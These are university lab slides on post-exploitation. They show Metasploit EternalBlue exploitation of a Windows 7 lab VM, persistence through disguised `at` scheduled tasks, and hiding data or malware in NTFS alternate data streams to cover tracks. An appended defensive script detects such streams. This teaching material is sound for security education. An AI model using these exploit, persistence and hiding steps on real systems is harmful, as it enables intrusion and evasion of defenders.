
Performing Post-Exploitation Techniques

CHAPTER 8 LAB 8

CSCB524/CCSB4113 1
MAINTAINING PERSISTENCE AFTER COMPROMISING A SYSTEM

Ways to Maintain Persistence on a Compromised System
I. Creating and manipulating scheduled jobs and tasks
II. Creating custom daemons and processes
III. Creating additional back doors
IV. Creating new users
V. Creating reverse and bind shells

Scheduled Tasks (at)
C:\>at \\VICTIM 8:17pm /every:M,W,F User_Feed_Synchronization.exe

• Windows command-line program to schedule tasks
– The scheduled program looks benign (it appears to update a user feed), but it may actually be a reverse call back to the attacking platform to maintain persistence
• Task Scheduler is the GUI version of the program

Kali VS Windows 7
10.0.2.37 (Kali)   10.0.2.38 (Windows 7)

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options
msf exploit(ms17_010_eternalblue) > set RHOST 10.0.2.38
msf exploit(ms17_010_eternalblue) > run

(RHOST is the Windows 7 IP address)
Standard shell response, not a Meterpreter payload

C:\Windows\system32> time

Press ENTER to leave the time unchanged

C:\Windows\system32> at 09:15 /every:Wednesday cmd /c "systeminfo > c:\info.txt"

C:\Windows\system32> at
• This shows the capability of being able to run any program we want:
– Pinging back
– Password sniffers
– Key loggers
COVERING TRACKS

Erase, Modify or Disable the Evidence
• Remove any unneeded files or tools that were added to the victim's machine
• Hide other files and resources in hidden or uncommon locations
– Linux, Unix, OS X
• Create a folder whose name begins with a dot (.)
– Windows
• Hide files in the System32 or User folders
• Apply the hidden attribute
• Use alternate data streams
C:\>type c:\info.txt > hello.txt:info.txt
C:\>start notepad hello.txt:info.txt

• Create a blank text file
C:\Windows\system32> cd \
C:\>type nul > hello.txt

• Check the file size
C:\>dir

• Hide info.txt inside hello.txt
C:\>type c:\info.txt > hello.txt:info.txt

• Check the file size again
C:\>dir

• Delete info.txt
C:\>del info.txt

• In Windows 7, open hello.txt

• In Windows 7, open cmd
C:\Users\Test>cd \
C:\>start notepad hello.txt:info.txt

Why is this useful to us?
• Instead of hiding a text file, an attacker could hide malware in the stream and then launch it with the 'at' program
• Nobody sees the hidden file, because it is stored in an alternate data stream

Alternate Data Streams (ADS)
• Alternate Data Streams (ADS) are a file attribute found only on the NTFS file system
• They allow file data to be forked into existing files without affecting their functionality, size, or display in traditional file browsing utilities like dir or Windows Explorer
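As an added example (not part of the lab), the defender-side check for the two slides above: a Python script that parses the output of `dir /r`, which unlike plain `dir` lists named streams, and reports every stream other than the common benign Zone.Identifier, flagging stream names that look like executables. The listing below is constructed; it includes the lab's hello.txt:info.txt stream and a hypothetical report.docx:svc.exe stream.

```python
import re

# Constructed sample of `dir /r` output (not captured from the lab VM): the
# lab's hello.txt:info.txt stream, a browser Mark-of-the-Web stream, and a
# hypothetical executable hidden inside a document.
SAMPLE_DIR_R = """\
 Volume in drive C has no label.
 Volume Serial Number is 1A2B-3C4D

 Directory of C:\\

01/15/2020  09:20 AM                 0 hello.txt
                                  2,314 hello.txt:info.txt:$DATA
01/15/2020  09:00 AM            12,345 setup.exe
                                     26 setup.exe:Zone.Identifier:$DATA
01/15/2020  09:30 AM            40,960 report.docx
                                 45,056 report.docx:svc.exe:$DATA
               3 File(s)         53,305 bytes
"""

# `dir /r` prints each named stream on its own indented line as
# "<size> <file>:<stream>:$DATA"; the unnamed main stream is never listed.
STREAM_RE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:]+):\$DATA\s*$")

BENIGN_STREAMS = {"Zone.Identifier"}  # Mark-of-the-Web, normal on downloads
EXEC_EXT = (".exe", ".dll", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".scr")

def find_alternate_streams(dir_output, ignore=BENIGN_STREAMS):
    """Return [(file, stream, size_bytes)] for every named stream in a
    `dir /r` listing, skipping stream names listed in `ignore`."""
    found = []
    for line in dir_output.splitlines():
        m = STREAM_RE.match(line)
        if not m:
            continue
        size, fname, stream = m.groups()
        if stream in ignore:
            continue
        found.append((fname, stream, int(size.replace(",", ""))))
    return found

def flag_executable_streams(streams):
    """Subset of find_alternate_streams() results whose stream name looks
    like code: the 'malware in a stream, launched by at' case from the lab.
    Triage these first and check scheduled tasks that reference them."""
    return [s for s in streams if s[1].lower().endswith(EXEC_EXT)]
```

On a live host, feed it the output of `dir /r /s C:\`, or list a single file's streams with PowerShell `Get-Item -Path <file> -Stream *`. Streams exist only on NTFS, so they are silently dropped when a file is copied to a FAT volume.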

Department of Computing
College of Computing and Informatics
Universiti Tenaga Nasional
